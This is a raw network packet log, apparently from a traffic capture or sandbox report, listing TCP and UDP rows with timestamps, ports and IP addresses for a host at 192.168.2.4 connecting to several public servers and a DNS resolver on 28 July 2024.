Jul 28, 2024 14:18:53.243000031 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.286313057 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.286330938 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.395657063 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:19:02.086437941 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:19:02.086616039 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:19:02.087527037 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:19:08.032073021 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:19:08.032241106 CEST	443	49742	162.159.61.3	192.168.2.4
Jul 28, 2024 14:19:08.032372952 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:19:33.588453054 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:33.593974113 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:33.594089031 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:33.594428062 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:33.594496965 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:33.599426985 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:33.599489927 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:33.599518061 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:33.599545956 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:34.160151958 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:34.160650969 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:34.160948992 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:34.163657904 CEST	49744	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:34.168795109 CEST	80	49744	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:34.205543995 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:34.205588102 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:34.205674887 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:34.205904961 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:34.205914974 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:35.037023067 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:35.037364960 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:35.037384987 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:35.039016008 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:35.039078951 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:35.040416002 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:35.040457010 CEST	443	49745	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:35.040632010 CEST	49745	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:35.058626890 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.058648109 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.058785915 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.059071064 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.059082985 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.750876904 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.751194000 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.751216888 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.752854109 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.752907991 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.761531115 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.761574984 CEST	443	49746	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:35.761622906 CEST	49746	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:35.798049927 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:35.798131943 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:35.801388979 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:35.801898956 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:35.801979065 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:36.428672075 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:36.429116964 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:36.429172993 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:36.430814981 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:36.430911064 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:36.431591034 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:36.431644917 CEST	443	49747	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:36.431777954 CEST	49747	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:36.446228981 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.446309090 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.446475983 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.446676016 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.446712017 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.948909998 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.949347973 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.949403048 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.951060057 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.951113939 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.951922894 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.951978922 CEST	443	49748	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:36.952028990 CEST	49748	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:36.986212969 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:36.986262083 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:36.986327887 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:36.986654043 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:36.986685991 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.496818066 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.502850056 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.502872944 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.504793882 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.504867077 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.516377926 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.516463041 CEST	443	49749	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.516531944 CEST	49749	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.519872904 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.519901037 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.519963026 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.520323038 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.520349026 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.731865883 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:37.737819910 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:37.738157988 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:37.738158941 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:37.738383055 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:37.743499041 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:37.743529081 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:37.743580103 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:37.743607998 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:37.990631104 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.991056919 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.991115093 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.992927074 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.993097067 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.995206118 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.995254993 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.995398045 CEST	443	49750	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.995472908 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.995472908 CEST	49750	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.995529890 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.995641947 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:37.995860100 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.996074915 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:37.996109962 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.370914936 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:38.370940924 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:38.371378899 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:38.374357939 CEST	49751	80	192.168.2.4	92.246.138.20
Jul 28, 2024 14:19:38.379761934 CEST	80	49751	92.246.138.20	192.168.2.4
Jul 28, 2024 14:19:38.395857096 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:38.395952940 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:38.398746967 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:38.405397892 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:38.405467987 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:38.497530937 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.498202085 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:38.498262882 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.501754999 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.501827002 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:38.509605885 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:38.509655952 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.509793997 CEST	443	49752	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:38.509821892 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:38.509884119 CEST	49752	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:38.528151035 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:38.528228045 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:38.528386116 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:38.528628111 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:38.528666019 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.001703024 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.011477947 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.011534929 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.014619112 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.014823914 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.027714968 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.027827978 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.028183937 CEST	443	49754	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.028264046 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.028264999 CEST	49754	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.131237984 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.131264925 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.131340027 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.131562948 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.131577015 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.235892057 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:39.236336946 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:39.236371040 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:39.239919901 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:39.239993095 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:39.241112947 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:39.241190910 CEST	443	49753	5.253.86.15	192.168.2.4
Jul 28, 2024 14:19:39.241265059 CEST	49753	443	192.168.2.4	5.253.86.15
Jul 28, 2024 14:19:39.247853994 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.247876883 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.248136044 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.248442888 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.248454094 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.658186913 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.658512115 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.658528090 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.661861897 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.661917925 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.662749052 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.662789106 CEST	443	49755	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:39.662933111 CEST	49755	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:39.665096045 CEST	49741	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:19:39.665158033 CEST	443	49741	172.64.41.3	192.168.2.4
Jul 28, 2024 14:19:39.964273930 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.965060949 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.965095043 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.968636036 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.968712091 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.969424963 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.969505072 CEST	443	49756	193.37.215.73	192.168.2.4
Jul 28, 2024 14:19:39.969571114 CEST	49756	443	192.168.2.4	193.37.215.73
Jul 28, 2024 14:19:39.972239017 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:39.972256899 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:39.972310066 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:39.972625017 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:39.972631931 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.609256983 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.609714031 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:40.609720945 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.611140966 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.611198902 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:40.612282991 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:40.612324953 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.612467051 CEST	443	49757	51.91.7.6	192.168.2.4
Jul 28, 2024 14:19:40.612519026 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:40.612529993 CEST	49757	443	192.168.2.4	51.91.7.6
Jul 28, 2024 14:19:40.617531061 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:40.617609978 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:40.617693901 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:40.617933989 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:40.617969990 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:41.081584930 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:41.081927061 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:41.081985950 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:41.083434105 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:41.083508015 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:41.084151030 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:41.084201097 CEST	443	49758	45.55.107.24	192.168.2.4
Jul 28, 2024 14:19:41.084297895 CEST	49758	443	192.168.2.4	45.55.107.24
Jul 28, 2024 14:19:41.087630987 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.087678909 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.087857008 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.088155985 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.088186979 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.599401951 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.600157976 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.600214958 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.603698015 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.603764057 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.604549885 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.604599953 CEST	443	49759	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.604687929 CEST	49759	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.606681108 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.606760025 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:41.606920004 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.607144117 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:41.607182026 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.093995094 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.094515085 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.094573975 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.098104000 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.098175049 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.098947048 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.099031925 CEST	443	49760	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.099225044 CEST	49760	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.101125002 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.101181030 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.101361036 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.101859093 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.101875067 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.584106922 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.584439039 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.584458113 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.587954044 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.588012934 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.588668108 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.588732004 CEST	443	49761	104.26.0.18	192.168.2.4
Jul 28, 2024 14:19:42.588787079 CEST	49761	443	192.168.2.4	104.26.0.18
Jul 28, 2024 14:19:42.592710018 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:42.592792034 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:42.592875004 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:42.593277931 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:42.593358994 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.089199066 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.089611053 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.089669943 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.092983961 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.093076944 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.093775034 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.093822956 CEST	443	49762	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.093888044 CEST	49762	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.102161884 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.102200985 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.102845907 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.103276014 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.103297949 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.577617884 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.578100920 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.578114033 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.581604004 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.581664085 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.582403898 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.582439899 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.582592010 CEST	443	49763	162.159.135.232	192.168.2.4
Jul 28, 2024 14:19:43.582633972 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.582649946 CEST	49763	443	192.168.2.4	162.159.135.232
Jul 28, 2024 14:19:43.584808111 CEST	49742	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:19:43.584835052 CEST	443	49742	162.159.61.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2024 14:18:46.669707060 CEST	49410	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:18:46.670027971 CEST	52429	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:18:46.681233883 CEST	53	52429	1.1.1.1	192.168.2.4
Jul 28, 2024 14:18:46.681261063 CEST	53	49410	1.1.1.1	192.168.2.4
Jul 28, 2024 14:18:46.689723015 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.005757093 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.155493021 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.155658960 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.155694962 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.156157970 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.156454086 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.196978092 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.198339939 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.205137014 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.206072092 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.207092047 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.208250999 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.316329002 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316395998 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316423893 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316451073 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316531897 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316560030 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.316596031 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.365662098 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.365662098 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.402695894 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:47.463445902 CEST	443	54136	172.64.41.3	192.168.2.4
Jul 28, 2024 14:18:47.513056040 CEST	54136	443	192.168.2.4	172.64.41.3
Jul 28, 2024 14:18:52.625226021 CEST	49614	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:18:52.625817060 CEST	59165	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:18:52.633246899 CEST	53	49614	1.1.1.1	192.168.2.4
Jul 28, 2024 14:18:52.633292913 CEST	53	59165	1.1.1.1	192.168.2.4
Jul 28, 2024 14:18:52.649408102 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:52.958879948 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.131545067 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.131592989 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.131628036 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.132342100 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.132375956 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.229640961 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.234637022 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.236748934 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.237529993 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.237895966 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.240255117 CEST	55236	443	192.168.2.4	162.159.61.3
